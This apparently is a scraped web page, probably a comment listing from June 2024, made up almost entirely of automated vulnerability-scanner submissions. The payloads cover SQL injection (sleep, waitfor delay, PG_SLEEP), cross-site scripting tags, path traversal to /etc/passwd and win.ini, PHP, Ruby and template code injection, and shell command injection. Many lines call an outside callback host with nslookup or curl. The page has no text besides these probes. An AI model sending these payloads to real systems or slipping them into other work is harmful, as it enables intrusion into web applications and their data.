".gethostbyname(lc("hitgx"."tmujblbt6c66f.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(70).chr(99).chr(68)."
23/06/2024

1

image
!(()&&!|*|*|
23/06/2024

1

image
pHqghUme
23/06/2024

1"&&sleep(27*1000)*brdjqh&&"

image
c:/windows/win.ini
23/06/2024

1

image
pHqghUme
23/06/2024

-1" OR 2+762-762-1=0+0+0+1 --

image
GRLpGpAG
23/06/2024

';print(md5(31337));$a='

image
GRLpGpAG
23/06/2024

xfs.bxss.me

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
23/06/2024

1

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
23/06/2024

1

image
';print(md5(31337));$a='
23/06/2024

1

image
pHqghUme
23/06/2024

xfs.bxss.me

image
'.print(md5(31337)).'
23/06/2024

1

image
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
23/06/2024

1

image
1 waitfor delay '0:0:15' --
23/06/2024

1

image
GRLpGpAG'||sleep(27*1000)*dgqmdn||'
23/06/2024

1

image
BCF7PsQQ'; waitfor delay '0:0:15' --
23/06/2024

1

image
pHqghUme
23/06/2024

'"()&%<zzz><ScRiPt >E35u(9841)</ScRiPt>

image
<!--
23/06/2024

1

image
Z91qmYby')) OR 469=(SELECT 469 FROM PG_SLEEP(15))--
23/06/2024

1

image
1'"
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
GRLpGpAG
23/06/2024

1

image
-1 OR 2+817-817-1=0+0+0+1
23/06/2024

1

image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
dfb{{98991*97996}}xca
23/06/2024

1

image
GRLpGpAG'"()&%<zzz><ScRiPt >fJ1i(9131)</ScRiPt>
23/06/2024

1

image
<th:t="${dfb}#foreach
23/06/2024

1

image
dfb{{98991*97996}}xca
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
GRLpGpAG
23/06/2024

1

image
GRLpGpAG
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
GRLpGpAG
23/06/2024

1

image
GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9004'>
23/06/2024

1

image
GRLpGpAG<body onload=aHlr(9158)>
23/06/2024

1

image
GRLpGpAG<img src=//xss.bxss.me/t/dot.gif onload=aHlr(9767)>
23/06/2024

1

image
GRLpGpAG<input autofocus onfocus=aHlr(9034)>
23/06/2024

1

image
<a HrEF=http://xss.bxss.me></a>
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
23/06/2024

1

image
pHqghUme
23/06/2024

ztcaCbWL

image
pHqghUme
23/06/2024

'+response.write(9394970*9312946)+'

image
GcLcG80D
23/06/2024

1

image
pHqghUme
23/06/2024

"+response.write(9394970*9312946)+"

image
pHqghUme
23/06/2024

1

image
"+response.write(9481935*9158755)+"
23/06/2024

1

image
pHqghUme
23/06/2024

../../../../../../../../../../../../../../etc/passwd

image
pHqghUme
23/06/2024

echo qusqjw$()\ fsdnbl\nz^xyu||a #' &echo qusqjw$()\ fsdnbl\nz^xyu||a #|" &echo qusqjw$()\ fsdnbl\nz^xyu||a #

image
pHqghUme
23/06/2024

1

image
pHqghUme bcc:074625.16574-6643.16574.c6498.19897.2@bxss.me
23/06/2024

1

image
pHqghUme
23/06/2024

../1

image
../../../../../../../../../../../../../../etc/passwd
23/06/2024

1

image
../../../../../../../../../../../../../../windows/win.ini
23/06/2024

1

image
pHqghUme
23/06/2024

&echo siooes$()\ eqyjua\nz^xyu||a #' &echo siooes$()\ eqyjua\nz^xyu||a #|" &echo siooes$()\ eqyjua\nz^xyu||a #

image
file:///etc/passwd
23/06/2024

1

image
../pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1&echo hynmsm$()\ iwawmd\nz^xyu||a #' &echo hynmsm$()\ iwawmd\nz^xyu||a #|" &echo hynmsm$()\ iwawmd\nz^xyu||a #

image
pHqghUme
23/06/2024

|echo bpeoth$()\ hfabod\nz^xyu||a #' |echo bpeoth$()\ hfabod\nz^xyu||a #|" |echo bpeoth$()\ hfabod\nz^xyu||a #

image
pHqghUme
23/06/2024

${9999529+9999400}

image
pHqghUme
23/06/2024

(nslookup -q=cname hitlywhsuzzwa82458.bxss.me||curl hitlywhsuzzwa82458.bxss.me))

image
pHqghUme
23/06/2024

1<esi:include src="http://bxss.me/rpb.png"/>

image
pHqghUme<esi:include src="http://bxss.me/rpb.png"/>
23/06/2024

1

image
pHqghUme
23/06/2024

1&n914222=v943030

image
pHqghUme&n960873=v999988
23/06/2024

1

image
pHqghUme
23/06/2024

|(nslookup -q=cname hitinmkitoabu70629.bxss.me||curl hitinmkitoabu70629.bxss.me)

image
pHqghUme
23/06/2024

)

image
echo cgzefu$()\ qkehpf\nz^xyu||a #' &echo cgzefu$()\ qkehpf\nz^xyu||a #|" &echo cgzefu$()\ qkehpf\nz^xyu||a #
23/06/2024

1

image
pHqghUme
23/06/2024

!(()&&!|*|*|

image
pHqghUme&echo zfeipi$()\ axdeuh\nz^xyu||a #' &echo zfeipi$()\ axdeuh\nz^xyu||a #|" &echo zfeipi$()\ axdeuh\nz^xyu||a #
23/06/2024

1

image
|echo eqetym$()\ jiyrts\nz^xyu||a #' |echo eqetym$()\ jiyrts\nz^xyu||a #|" |echo eqetym$()\ jiyrts\nz^xyu||a #
23/06/2024

1

image
|(nslookup -q=cname hitrhqmfyvcpaa15f3.bxss.me||curl hitrhqmfyvcpaa15f3.bxss.me)
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1"&&sleep(27*1000)*iuheov&&"

image
pHqghUme
23/06/2024

1'||sleep(27*1000)*ovddzg||'

image
pHqghUme
23/06/2024

^(#$!@#$)(()))******

image
)
23/06/2024

1

image
!(()&&!|*|*|
23/06/2024

1

image
pHqghUme
23/06/2024

http://bxss.me/t/fit.txt?.jpg

image
pHqghUme
23/06/2024

1"||sleep(27*1000)*bldino||"

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

'.gethostbyname(lc('hitkl'.'cgttvodz26db0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(89).chr(106).chr(79).'

image
pHqghUme
23/06/2024

".gethostbyname(lc("hitfz"."lztcsdtt4916a.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(66).chr(100).chr(75)."

image
pHqghUme
23/06/2024

c:/windows/win.ini

image
pHqghUme
23/06/2024

qkQhxQCY

image
'.gethostbyname(lc('hitxq'.'qkvfkblwb2b3f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(88).chr(115).chr(83).'
23/06/2024

1

image
'"()
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
23/06/2024

1

image
;(nslookup -q=cname hitdvpqscbovs82853.bxss.me||curl hitdvpqscbovs82853.bxss.me)|(nslookup -q=cname hitdvpqscbovs82853.bxss.me||curl hitdvpqscbovs82853.bxss.me)&(nslookup -q=cname hitdvpqscbovs82853.bxss.me||curl hitdvpqscbovs82853.bxss.me)
23/06/2024

1

image
http://bxss.me/t/fit.txt?.jpg
23/06/2024

1

image
pHqghUme
23/06/2024

bxss.me/t/xss.html?%00

image
pHqghUme
23/06/2024

-1 OR 2+530-530-1=0+0+0+1 --

image
pHqghUme"||sleep(27*1000)*xvemep||"
23/06/2024

1

image
pHqghUme
23/06/2024

"+"A".concat(70-3).concat(22*4).concat(105).concat(68).concat(116).concat(87)+(require"socket" Socket.gethostbyname("hitwk"+"gvjjpmmgd0a49.bxss.me.")[3].to_s)+"

image
pHqghUme
23/06/2024

-1 OR 2+48-48-1=0+0+0+1

image
"+"A".concat(70-3).concat(22*4).concat(105).concat(65).concat(97).concat(72)+(require"socket" Socket.gethostbyname("hitxd"+"mgbeteow21079.bxss.me.")[3].to_s)+"
23/06/2024

1

image
pHqghUme
23/06/2024

-1' OR 2+357-357-1=0+0+0+1 or 'hiI9LnCw'='

image
pHqghUme
23/06/2024

-1" OR 2+515-515-1=0+0+0+1 --

image
pHqghUme
23/06/2024

if(now()=sysdate(),sleep(15),0)

image
pHqghUme
23/06/2024

comment/.

image
pHqghUme
23/06/2024

${@print(md5(31337))}\

image
pHqghUme
23/06/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
pHqghUme
23/06/2024

'.print(md5(31337)).'

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
23/06/2024

1

image
pHqghUme
23/06/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
';print(md5(31337));$a='
23/06/2024

1

image
comment
23/06/2024

1

image
pHqghUme
23/06/2024

-1; waitfor delay '0:0:15' --

image
";print(md5(31337));$a="
23/06/2024

1

image
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
23/06/2024

1

image
comment
23/06/2024

1

image
${@print(md5(31337))}
23/06/2024

1

image
pHqghUme
23/06/2024

-1); waitfor delay '0:0:15' --

image
pHqghUme
23/06/2024

xfs.bxss.me

image
${@print(md5(31337))}\
23/06/2024

1

image
comment/.
23/06/2024

1

image
'.print(md5(31337)).'
23/06/2024

1

image
/etc/shells
23/06/2024

1

image
c:/windows/win.ini
23/06/2024

1

image
pHqghUme
23/06/2024

W9gQzefr')); waitfor delay '0:0:15' --

image
pHqghUme
23/06/2024

19587332

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

-5) OR 38=(SELECT 38 FROM PG_SLEEP(15))--

image
pHqghUme
23/06/2024

bfg7383<s1﹥s2ʺs3ʹhjl7383

image
pHqghUme
23/06/2024

1

image
<!--
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

<th:t="${dfb}#foreach

image
pHqghUme
23/06/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
pHqghUme
23/06/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
pHqghUme
23/06/2024

dfb__${98991*97996}__::.x

image
pHqghUme
23/06/2024

1</script><script>9Mww(9135)</script>

image
pHqghUme
23/06/2024

1

image
NQ0HLV5U
23/06/2024

1

image
pHqghUme'"()&%<zzz><ScRiPt >9Mww(9969)</ScRiPt>
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
-1 OR 2+765-765-1=0+0+0+1 --
23/06/2024

1

image
bfg1444<s1﹥s2ʺs3ʹhjl1444
23/06/2024

1

image
-1 OR 2+447-447-1=0+0+0+1
23/06/2024

1

image
-1' OR 2+391-391-1=0+0+0+1 --
23/06/2024

1

image
dfb__${98991*97996}__::.x
23/06/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
23/06/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
23/06/2024

1

image
1 waitfor delay '0:0:15' --
23/06/2024

1

image
pHqghUme</script><script>9Mww(9867)</script>
23/06/2024

1

image
wlnPmmNT'); waitfor delay '0:0:15' --
23/06/2024

1

image
k91ttnBV' OR 352=(SELECT 352 FROM PG_SLEEP(15))--
23/06/2024

1

image
pHqghUme
23/06/2024

-1' OR 2+751-751-1=0+0+0+1 or 'cgNVzuC9'='

image
gPug68Sx')) OR 121=(SELECT 121 FROM PG_SLEEP(15))--
23/06/2024

1

image
pHqghUme
23/06/2024

-1; waitfor delay '0:0:15' --

image
pHqghUme
23/06/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
pHqghUme
23/06/2024

response.write(9746838*9647027)

image
qU1TGKwZ
23/06/2024

1

image
pHqghUme
23/06/2024

'+response.write(9746838*9647027)+'

image
pHqghUme
23/06/2024

&(nslookup -q=cname hitmddfdtllpr74cfc.bxss.me||curl hitmddfdtllpr74cfc.bxss.me)&'\"`0&(nslookup -q=cname hitmddfdtllpr74cfc.bxss.me||curl hitmddfdtllpr74cfc.bxss.me)&`'

image
pHqghUme&echo cmtuhj$()\ qtgwfh\nz^xyu||a #' &echo cmtuhj$()\ qtgwfh\nz^xyu||a #|" &echo cmtuhj$()\ qtgwfh\nz^xyu||a #
23/06/2024

1

image
(nslookup -q=cname hitqqsvdqlhya06fa7.bxss.me||curl hitqqsvdqlhya06fa7.bxss.me))
23/06/2024

1

image
pHqghUme
23/06/2024

http://bxss.me/t/fit.txt?.jpg

image
-1 OR 2+615-615-1=0+0+0+1
23/06/2024

1

image
-1' OR 2+681-681-1=0+0+0+1 --
23/06/2024

1

image
if(now()=sysdate(),sleep(15),0)
23/06/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
23/06/2024

1

image
fGED8dnc'); waitfor delay '0:0:15' --
23/06/2024

1

image
;(nslookup -q=cname hitvfzvwjjdwd5821f.bxss.me||curl hitvfzvwjjdwd5821f.bxss.me)|(nslookup -q=cname hitvfzvwjjdwd5821f.bxss.me||curl hitvfzvwjjdwd5821f.bxss.me)&(nslookup -q=cname hitvfzvwjjdwd5821f.bxss.me||curl hitvfzvwjjdwd5821f.bxss.me)
23/06/2024

1

image
zPxxs4xt' OR 698=(SELECT 698 FROM PG_SLEEP(15))--
23/06/2024

1

image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
23/06/2024

1

image
pHqghUme
23/06/2024

1'&&sleep(27*1000)*pzvolt&&'

image
pHqghUme
23/06/2024

1"&&sleep(27*1000)*cfeccc&&"

image
'+'A'.concat(70-3).concat(22*4).concat(114).concat(74).concat(110).concat(71)+(require'socket' Socket.gethostbyname('hitua'+'qbsbqnvl219da.bxss.me.')[3].to_s)+'
23/06/2024

1

image
pHqghUme
23/06/2024

'.print(md5(31337)).'

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
23/06/2024

1

image
pHqghUme
23/06/2024

xfs.bxss.me

image
${@print(md5(31337))}\
23/06/2024

1

image
'"
23/06/2024

1

image
pHqghUme
23/06/2024

'"()&%<zzz><ScRiPt >xCJL(9947)</ScRiPt>

image
pHqghUme
23/06/2024

19487"();}]9219

image
dfb{{98991*97996}}xca
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme'"()&%<zzz><ScRiPt >xnjg(9313)</ScRiPt>
23/06/2024

1

image
pHqghUme
23/06/2024

'+response.write(9504959*9426942)+'

image
pHqghUme
23/06/2024

"+response.write(9504959*9426942)+"

image
response.write(9156860*9316594)
23/06/2024

1

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
23/06/2024

1

image
pHqghUme
23/06/2024

-1" OR 2+603-603-1=0+0+0+1 --

image
pHqghUme
23/06/2024

if(now()=sysdate(),sleep(3),0)

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

^(#$!@#$)(()))******

image
pHqghUme
23/06/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
pHqghUme
23/06/2024

http://bxss.me/t/fit.txt?.jpg

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
23/06/2024

1

image
-1' OR 2+179-179-1=0+0+0+1 --
23/06/2024

1

image
pHqghUme"||sleep(27*1000)*gbkvpa||"
23/06/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
23/06/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
23/06/2024

1

image
1 waitfor delay '0:0:15' --
23/06/2024

1

image
comment
24/06/2024

1

image
pHqghUme
24/06/2024

19044970

image
'"
24/06/2024

1

image
pHqghUme
24/06/2024

dfb__${98991*97996}__::.x

image
pHqghUme
24/06/2024

%31%39%32%39%34%22%28%29%3B%7D%5D%39%35%32%37

image
1'"
24/06/2024

1

image
'"()&%<zzz><ScRiPt >HutI(9336)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
dfb__${98991*97996}__::.x
24/06/2024

1

image
pHqghUme</script><script>HutI(9083)</script>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
GRLpGpAG
24/06/2024

'"()&%<zzz><ScRiPt >ZPBO(9259)</ScRiPt>

image
GRLpGpAG
24/06/2024

1

image
1DRxRDNFLO
24/06/2024

1

image
GRLpGpAG
24/06/2024

response.write(9101701*9300739)

image
GRLpGpAG
24/06/2024

'+response.write(9101701*9300739)+'

image
GRLpGpAG
24/06/2024

echo cvnosp$()\ gfdtir\nz^xyu||a #' &echo cvnosp$()\ gfdtir\nz^xyu||a #|" &echo cvnosp$()\ gfdtir\nz^xyu||a #

image
GRLpGpAG
24/06/2024

|echo uiddik$()\ grakhn\nz^xyu||a #' |echo uiddik$()\ grakhn\nz^xyu||a #|" |echo uiddik$()\ grakhn\nz^xyu||a #

image
GRLpGpAG&n938544=v963069
24/06/2024

1

image
GRLpGpAG
24/06/2024

;(nslookup -q=cname hitcyjzafwquu71ca6.bxss.me||curl hitcyjzafwquu71ca6.bxss.me)|(nslookup -q=cname hitcyjzafwquu71ca6.bxss.me||curl hitcyjzafwquu71ca6.bxss.me)&(nslookup -q=cname hitcyjzafwquu71ca6.bxss.me||curl hitcyjzafwquu71ca6.bxss.me)

image
GRLpGpAG
24/06/2024

^(#$!@#$)(()))******

image
GRLpGpAG
24/06/2024

".gethostbyname(lc("hitgq"."rjivarpkee6da.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(72).chr(112).chr(78)."

image
GRLpGpAG
24/06/2024

bxss.me

image
GRLpGpAG
24/06/2024

dfb{@98991*97996}xca

image
GRLpGpAG
24/06/2024

";print(md5(31337));$a="

image
GRLpGpAG
24/06/2024

dfb{{=98991*97996}}xca

image
GRLpGpAG
24/06/2024

'+'A'.concat(70-3).concat(22*4).concat(109).concat(66).concat(100).concat(80)+(require'socket' Socket.gethostbyname('hityv'+'fgfxqsck5230d.bxss.me.')[3].to_s)+'

image
GRLpGpAG
24/06/2024

'"()&%<zzz><ScRiPt >hNAA(9888)</ScRiPt>

image
GRLpGpAG'"()&%<zzz><ScRiPt >hNAA(9157)</ScRiPt>
24/06/2024

1

image
GRLpGpAG
24/06/2024

1<ScRiPt >ZPBO(9528)</ScRiPt>

image
GRLpGpAG
24/06/2024

1<img src=xyz OnErRor=ZPBO(9104)>

image
GRLpGpAG
24/06/2024

1

image
GRLpGpAG
24/06/2024

1}body{zzz:Expre/**/SSion(ZPBO(9261))}

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
pHqghUme
24/06/2024

1 bcc:074625.16572-28913.16572.3006e.19898.2@bxss.me

image
${10000252+10000167}
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
<th:t="${dfb}#foreach
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

`(nslookup -q=cname hitbcdydihlku78e01.bxss.me||curl hitbcdydihlku78e01.bxss.me)`

image
pHqghUme
24/06/2024

http://bxss.me/t/fit.txt?.jpg

image
"+"A".concat(70-3).concat(22*4).concat(100).concat(75).concat(117).concat(69)+(require"socket" Socket.gethostbyname("hitwm"+"ltxvvaww8714e.bxss.me.")[3].to_s)+"
24/06/2024

1

image
pHqghUme
24/06/2024

19815198

image
Q2qUkG2n')); waitfor delay '0:0:15' --
24/06/2024

1

image
@@3kDAe
24/06/2024

1

image
pHqghUme<script>FH4B(9347)</script>9347
24/06/2024

1

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
pHqghUme
24/06/2024

../1

image
pHqghUme
24/06/2024

)

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
24/06/2024

1

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >3ihU(9488)</ScRiPt>

image
pHqghUme
24/06/2024

19163685

image
-1" OR 2+459-459-1=0+0+0+1 --
24/06/2024

1

image
pHqghUme
24/06/2024

dfb{{98991*97996}}xca

image
pHqghUme
24/06/2024

dfb[[${98991*97996}]]xca

image
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
pHqghUme
24/06/2024

nKaPMFrO

image
1BZiCST6mxO
24/06/2024

1

image
6efnF3E1
24/06/2024

1

image
pHqghUme
24/06/2024

'+response.write(9306175*9338014)+'

image
pHqghUme
24/06/2024

1 bcc:074625.16574-29221.16574.66454.19898.2@bxss.me

image
response.write(9260165*9390992)
24/06/2024

1

image
pHqghUme
24/06/2024

echo pvlrbt$()\ oubhdn\nz^xyu||a #' &echo pvlrbt$()\ oubhdn\nz^xyu||a #|" &echo pvlrbt$()\ oubhdn\nz^xyu||a #

image
'+response.write(9260165*9390992)+'
24/06/2024

1

image
pHqghUme
24/06/2024

to@example.com> bcc:074625.16574-29222.16574.66454.19898.2@bxss.me

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../etc/passwd

image
pHqghUme
24/06/2024

|echo cxwxji$()\ pajyrb\nz^xyu||a #' |echo cxwxji$()\ pajyrb\nz^xyu||a #|" |echo cxwxji$()\ pajyrb\nz^xyu||a #

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../windows/win.ini

image
pHqghUme bcc:074625.16574-29223.16574.66454.19898.2@bxss.me
24/06/2024

1

image
pHqghUme
24/06/2024

1|echo iqgluu$()\ wsaazx\nz^xyu||a #' |echo iqgluu$()\ wsaazx\nz^xyu||a #|" |echo iqgluu$()\ wsaazx\nz^xyu||a #

image
'"()&%<zzz><ScRiPt >3ihU(9470)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

(nslookup -q=cname hitulcylterebc297d.bxss.me||curl hitulcylterebc297d.bxss.me))

image
../../../../../../../../../../../../../../etc/passwd
24/06/2024

1

image
pHqghUme
24/06/2024

&nslookup -q=cname hiticiacbwbnv807bc.bxss.me&'\"`0&nslookup -q=cname hiticiacbwbnv807bc.bxss.me&`'

image
pHqghUme
24/06/2024

&(nslookup -q=cname hitazebervlrxe5d50.bxss.me||curl hitazebervlrxe5d50.bxss.me)&'\"`0&(nslookup -q=cname hitazebervlrxe5d50.bxss.me||curl hitazebervlrxe5d50.bxss.me)&`'

image
pHqghUme
24/06/2024

1<esi:include src="http://bxss.me/rpb.png"/>

image
pHqghUme
24/06/2024

|(nslookup -q=cname hittffdqvtrzn21fec.bxss.me||curl hittffdqvtrzn21fec.bxss.me)

image
file:///etc/passwd
24/06/2024

1

image
pHqghUme
24/06/2024

`(nslookup -q=cname hitudrvduxibnc48aa.bxss.me||curl hitudrvduxibnc48aa.bxss.me)`

image
bfg1927<s1﹥s2ʺs3ʹhjl1927
24/06/2024

1

image
${10000267+9999561}
24/06/2024

1

image
echo yyjjmx$()\ rpbpqi\nz^xyu||a #' &echo yyjjmx$()\ rpbpqi\nz^xyu||a #|" &echo yyjjmx$()\ rpbpqi\nz^xyu||a #
24/06/2024

1

image
../pHqghUme
24/06/2024

1

image
|echo aqyofa$()\ qaloeu\nz^xyu||a #' |echo aqyofa$()\ qaloeu\nz^xyu||a #|" |echo aqyofa$()\ qaloeu\nz^xyu||a #
24/06/2024

1

image
pHqghUme|echo hrghpr$()\ bckvnj\nz^xyu||a #' |echo hrghpr$()\ bckvnj\nz^xyu||a #|" |echo hrghpr$()\ bckvnj\nz^xyu||a #
24/06/2024

1

image
pHqghUme
24/06/2024

)

image
(nslookup -q=cname hitpqrliggicsa5f30.bxss.me||curl hitpqrliggicsa5f30.bxss.me))
24/06/2024

1

image
pHqghUme
24/06/2024

!(()&&!|*|*|

image
$(nslookup -q=cname hituouixsihkt5bbee.bxss.me||curl hituouixsihkt5bbee.bxss.me)
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
&(nslookup -q=cname hitrdhdgnwdecc71d6.bxss.me||curl hitrdhdgnwdecc71d6.bxss.me)&'\"`0&(nslookup -q=cname hitrdhdgnwdecc71d6.bxss.me||curl hitrdhdgnwdecc71d6.bxss.me)&`'
24/06/2024

1

image
<th:t="${dfb}#foreach
24/06/2024

1

image
)
24/06/2024

1

image
pHqghUme
24/06/2024

c:/windows/win.ini

image
!(()&&!|*|*|
24/06/2024

1

image
pHqghUme
24/06/2024

bxss.me

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
pHqghUme
24/06/2024

1&n900172=v948353

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
24/06/2024

1

image
Http://bxss.me/t/fit.txt
24/06/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
24/06/2024

1

image
pHqghUme&n965863=v973618
24/06/2024

1

image
`(nslookup -q=cname hitkoufusgkhs44a7c.bxss.me||curl hitkoufusgkhs44a7c.bxss.me)`
24/06/2024

1

image
bxss.me
24/06/2024

1

image
;(nslookup -q=cname hituczekxulvo169af.bxss.me||curl hituczekxulvo169af.bxss.me)|(nslookup -q=cname hituczekxulvo169af.bxss.me||curl hituczekxulvo169af.bxss.me)&(nslookup -q=cname hituczekxulvo169af.bxss.me||curl hituczekxulvo169af.bxss.me)
24/06/2024

1

image
pHqghUme
24/06/2024

'.gethostbyname(lc('hitjf'.'mvwlfqja66176.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(70).chr(121).chr(72).'

image
%70%48%71%67%68%55%6D%65%39%34%35%33%22%28%29%3B%7D%5D%39%33%38%37
24/06/2024

1

image
pHqghUme
24/06/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
'.gethostbyname(lc('hitfy'.'bgikcgyb0e720.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(71).chr(115).chr(89).'
24/06/2024

1

image
".gethostbyname(lc("hitbg"."myzpjgxvd579b.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(86).chr(107).chr(79)."
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

"+"A".concat(70-3).concat(22*4).concat(108).concat(83).concat(111).concat(70)+(require"socket" Socket.gethostbyname("hitss"+"sfhhivcs8de9c.bxss.me.")[3].to_s)+"

image
pHqghUme
24/06/2024

bxss.me/t/xss.html?%00

image
pHqghUme
24/06/2024

1'&&sleep(27*1000)*ojpelf&&'

image
pHqghUme
24/06/2024

comment

image
pHqghUme
24/06/2024

1'||sleep(27*1000)*whobjw||'

image
pHqghUme
24/06/2024

comment/.

image
pHqghUme
24/06/2024

1"||sleep(27*1000)*fpfjky||"

image
comment
24/06/2024

1

image
${@print(md5(31337))}\
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
comment
24/06/2024

1

image
'.print(md5(31337)).'
24/06/2024

1

image
comment/.
24/06/2024

1

image
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
24/06/2024

1

image
'"()
24/06/2024

1

image
pHqghUme
24/06/2024

xfs.bxss.me

image
pHqghUme
24/06/2024

'"

image
pHqghUme
24/06/2024

<!--

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >9jrG(9918)</ScRiPt>

image
pHqghUme'||sleep(27*1000)*fbzduz||'
24/06/2024

1

image
<!--
24/06/2024

1

image
pHqghUme"||sleep(27*1000)*tywbjs||"
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

<%={{={@{#{${dfb}}%>

image
pHqghUme
24/06/2024

<th:t="${dfb}#foreach

image
pHqghUme
24/06/2024

dfb{{98991*97996}}xca

image
pHqghUme
24/06/2024

XwBlDs1E

image
pHqghUme
24/06/2024

-1' OR 2+212-212-1=0+0+0+1 --

image
pHqghUme
24/06/2024

-1" OR 2+329-329-1=0+0+0+1 --

image
pHqghUme
24/06/2024

if(now()=sysdate(),sleep(15),0)

image
pHqghUme
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
pHqghUme
24/06/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1</script><script>9jrG(9228)</script>

image
'"()&%<zzz><ScRiPt >9jrG(9780)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

-1); waitfor delay '0:0:3' --

image
<%={{={@{#{${dfb}}%>
24/06/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
24/06/2024

1

image
dfb__${98991*97996}__::.x
24/06/2024

1

image
pHqghUme9037"();}]9846
24/06/2024

1

image
pHqghUme
24/06/2024

SE5cayks'; waitfor delay '0:0:15' --

image
pHqghUme</script><script>9jrG(9010)</script>
24/06/2024

1

image
pHqghUme
24/06/2024

PL8rGaNP'); waitfor delay '0:0:15' --

image
pHqghUme
24/06/2024

-5 OR 940=(SELECT 940 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

-5) OR 811=(SELECT 811 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >F2fv(9117)</ScRiPt>

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >F2fv(9122)</ScRiPt>

image
pHqghUme
